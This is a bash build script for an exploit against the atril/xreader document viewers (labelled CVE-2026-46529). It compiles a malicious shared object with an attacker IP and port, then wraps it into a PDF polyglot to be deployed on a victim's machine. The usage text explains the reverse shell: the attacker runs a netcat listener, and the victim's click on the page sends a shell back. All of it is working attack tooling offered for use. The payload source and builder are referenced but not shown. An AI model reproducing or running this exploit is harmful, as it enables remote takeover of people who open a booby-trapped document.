#!/usr/bin/env bash
#
# exploit.sh — one-shot builder for the atril/xreader CVE-2026-46529 polyglot.
#
# Compiles evil.so with the IP/port you want, runs the polyglot builder,
# outputs the PDF ready to deploy. The compiled .so is removed at the
# end unless --keep-so.
#
# Usage:
#   ./exploit.sh -o report.pdf --ip 192.168.1.5 --port 4444
#   ./exploit.sh -h
#

set -euo pipefail

IP="127.0.0.1"
PORT="9000"
OUTPUT="polyglot.pdf"
SO="evil.so"
CC="${CC:-gcc}"
KEEP_SO=false

usage() {
    cat <<'EOF'
Usage: ./exploit.sh [options]

Options:
  -o, --output FILE  Output PDF path (default: polyglot.pdf)
                     The polyglot expects to be deployed on the victim
                     with the SAME BASENAME as this file. The directory
                     does NOT matter — atril resolves the path at runtime.
  --ip IP            Reverse shell target IP   (default: 127.0.0.1)
  --port PORT        Reverse shell target port (default: 9000)
  --cc COMPILER      C compiler                (default: gcc, env: CC)
  --keep-so          Don't delete evil.so after build
  -h, --help         Show this message

Examples:
  ./exploit.sh -o report.pdf --ip 192.168.1.5 --port 4444
  CC=aarch64-linux-gnu-gcc ./exploit.sh -o x.pdf --ip 10.0.0.1

After build:
  Attacker: nc -lvnp <port>
  Victim:   atril /any/where/<basename-of-output>
            (click anywhere on the page → shell back)
EOF
}

while [[ $# -gt 0 ]]; do
    case "$1" in
        -o|--output) OUTPUT="$2"; shift 2 ;;
        --ip)        IP="$2"; shift 2 ;;
        --port)      PORT="$2"; shift 2 ;;
        --cc)        CC="$2"; shift 2 ;;
        --keep-so)   KEEP_SO=true; shift ;;
        -h|--help)   usage; exit 0 ;;
        *)           echo "Unknown option: $1" >&2; usage >&2; exit 1 ;;
    esac
done

# Basename the polyglot expects on victim disk is derived from the
# output filename. If you need them to differ, rename the file after build.
NAME="$(basename "$OUTPUT")"

if [[ "$(uname)" == "Darwin" ]]; then
    echo "[!] macOS detected. Apple's ld doesn't accept GNU build-id flags." >&2
    echo "    Compile on a Linux host (or via Docker / cross-compiler)." >&2
    exit 1
fi

cd "$(dirname "$0")"

echo "[*] compiling $SO  (CC=$CC, IP=$IP, PORT=$PORT)"
"$CC" -shared -fPIC -Wl,--build-id=sha1 \
    -DATTACKER_IP="\"$IP\"" \
    -DATTACKER_PORT="\"$PORT\"" \
    -o "$SO" evil_gtk_module.c

echo "[*] building polyglot $OUTPUT  (basename embedded: $NAME)"
python3 build_polyglot.py "$SO" "$OUTPUT"

if [[ "$KEEP_SO" != true ]]; then
    rm -f "$SO"
    echo "[+] cleaned up $SO  (use --keep-so to retain)"
fi

echo ""
echo "[+] polyglot ready: $OUTPUT"
echo "    deploy to victim with basename: $NAME"
echo "    attacker listener: nc -lvnp $PORT"